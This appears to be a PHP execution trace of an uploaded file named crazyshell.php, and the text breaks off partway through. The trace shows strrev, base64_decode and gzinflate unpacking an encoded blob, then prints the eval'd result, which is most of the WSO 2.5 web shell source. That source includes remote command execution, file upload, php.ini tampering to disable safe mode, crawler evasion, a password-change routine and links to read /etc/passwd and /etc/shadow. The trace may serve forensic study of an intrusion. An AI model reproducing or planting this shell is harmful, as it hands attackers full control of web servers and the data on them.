2 A /var/www/html/uploads/crazyshell.php 24 $kses_str = '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 9 0 0.000771 486904 strrev 0 /var/www/html/uploads/crazyshell.php 25 1 '46esab'
3 9 1 0.000791 486968
3 9 R 'base64'
3 10 0 0.000805 486936 strrev 0 /var/www/html/uploads/crazyshell.php 25 1 'edoced'
3 10 1 0.000818 487000
3 10 R 'decode'
2 A /var/www/html/uploads/crazyshell.php 25 $filterfunc = 'base64_decode'
3 11 0 0.000844 486944 base64_decode 0 /var/www/html/uploads/crazyshell.php 26 1 '5X1te9s2EuBn93n6H2BWW0qNLEty0s1Kluxs4mxyTeKs7Wy3Z/tUWqQk1hKpkpQdN5v/fjODd77Ictre3j2nNpZIDAYDYDAYDAaDr7/a/e7rr7bexv7XX323+/VXX39VC6OQsQFzUm8SjBaxHwziyeQi8sPUu5oHo8kqGmdhHKWDi2i1nMeeP1p4H0eTcB6k4W8B5Oy0315EyzjNKEG/dPqAfZbBw+EkXgYRq7vL2bIF5blN99ZtQHI4qQNEg30Cmia3SZgF+NxkSBSmb03G8zill/j4GQmmXGGaBlm9Nnp/fHp27o5nwfj6duleNhpff4W4AAIJHAUfwzRL6+7tcmccR5Nw2gIK3EaDBeNZzNyfAm82m7kSs4H35OifH44Q9S/xdWDhzZJwUQLAtgfMdQFsC+G2agtshCsvDSJvAfSPTo9O/nV0cu6ePj95/f5s9PL1m6N3z94eQc4+wc9Xc8hARE+DbATUZkEEpAMiAfFbOwGINEtGSbCce2PAersc'
3 11 1 0.000927 507456
3 11 R '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
2 A /var/www/html/uploads/crazyshell.php 26 $filter = '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
3 12 0 0.001583 507424 strrev 0 /var/www/html/uploads/crazyshell.php 27 1 'etalfnizg'
3 12 1 0.001598 507496
3 12 R 'gzinflate'
2 A /var/www/html/uploads/crazyshell.php 27 $preparefunc = 'gzinflate'
3 13 0 0.001624 507464 gzinflate 0 /var/www/html/uploads/crazyshell.php 28 1 '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
3 13 1 0.002108 564840
3 13 R '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
2 6 1 0.002261 523768
2 6 R '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
1 A /var/www/html/uploads/crazyshell.php 62 $wpautop = '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
2 14 0 0.004523 1001856 eval 1 '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($me);\r\n\t\t$z0r = str_replace($wp_nonce, md5(trim($_REQUEST[\'joke\'])), $lul);\r\n\t\t$lol = fopen($me, "w");\r\n\t\tfwrite($lol, $z0r);\r\n\t\tfclose($lol);\r\n\t\tif(stristr(file_get_contents($me), md5(trim($_REQUEST[\'joke\']))))\r\n\t\t{\r\n\t\t\techo \'passwordchanged\';\r\n\t\t} else {\r\n\t\t\techo \'fail\';\r\n\t\t}\r\n\t}\r\n\texit;\r\n}\r\nif(isset($_REQUEST[\'newname\']))\r\n{\r\n\tif(trim($_REQUEST[\'newname\']) != \'\') \r\n\t{\r\n\t\t$name = trim($_REQUEST[\'newname\']).\'.php\';\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($me);\r\n\t\t$lol = fopen($name, "w");\r\n\t\tfwrite($lol, $lul);\r\n\t\tfclose($lol);\r\n\t\tif(file_exists($name))\r\n\t\t{\r\n\t\t\tunlink($me);\r\n\t\t\techo \'v0ld3m0rt:\'.$name.\':v0ld3m0rt\';\r\n\t\t}\r\n\t}\r\n\texit;\r\n}\r\n/*\r\n\tEnd Mod\r\n*/\r\n\r\n$color = "#00ff00";\r\n$default_action = \'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n }\r\n}\r\n\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif(function_exists(\'set_magic_quotes_runtime\')) @set_magic_quotes_runtime(0);\r\n@define(\'WSO_VERSION\', \'2.5\');\r\n\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction WSOstripslashes($array) {\r\n\t\treturn is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = WSOstripslashes($_POST);\r\n $_COOKIE = WSOstripslashes($_COOKIE);\r\n}\r\n\r\nfunction wsoLogin() {\r\n\tdie("<center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></center>");\r\n}\r\n\r\nfunction WSOsetcookie($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\n\r\nif(!empty($wp_nonce)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $wp_nonce))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $wp_nonce);\r\n\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $wp_nonce))\r\n wsoLogin();\r\n}\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\r\n\r\nfunction wsoHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n\tglobal $color;\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . WSO_VERSION ."</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: $color !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $item)\r\n\t\t$opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Mail Test\'=>\'MailTest\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\');\r\n\tif(!empty($GLOBALS[\'wp_nonce\']))\r\n\t\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\r\n\t$drives = "";\r\n\tif($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif(is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\r\n . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\')\r\n . \' <a href=# onclick="g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\' . $drives . \'</td>\'\r\n . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\r\n . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\';\r\n}\r\n\r\nfunction wsoFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'green\'>(Writeable)</font>":" <font color=red>(Not writable)</font>";\r\n echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\'g(null,this.c.value,\\"\\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value);return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'Console\',null,this.c.value);return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMAn\'>\r\n\t\t<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>\r\n\t</tr></table></div></body></html>";\r\n}\r\n\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\r\n function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\r\n function posix_getgrgid($p) {return false;} }\r\n\r\nfunction wsoEx($in) {\r\n\t$out = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$out);\r\n\t\t$out = @join("\\n",$out);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$out = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$out = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$out .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}\r\n\treturn $out;\r\n}\r\n\r\nfunction wsoViewSize($s) {\r\n if (is_int($s))\r\n $s = sprintf("%u", $s);\r\n \r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\n\r\nfunction wsoPerms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\n\r\nfunction wsoPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n\telse\r\n\t\treturn \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n}\r\n\r\nfunction wsoScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\n\r\nfunction wsoWhich($p) {\r\n\t$path = wsoEx(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n\twsoHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction wsoSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\r\n\twsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\twsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\twsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\twsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\twsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\twsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\twsoSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = 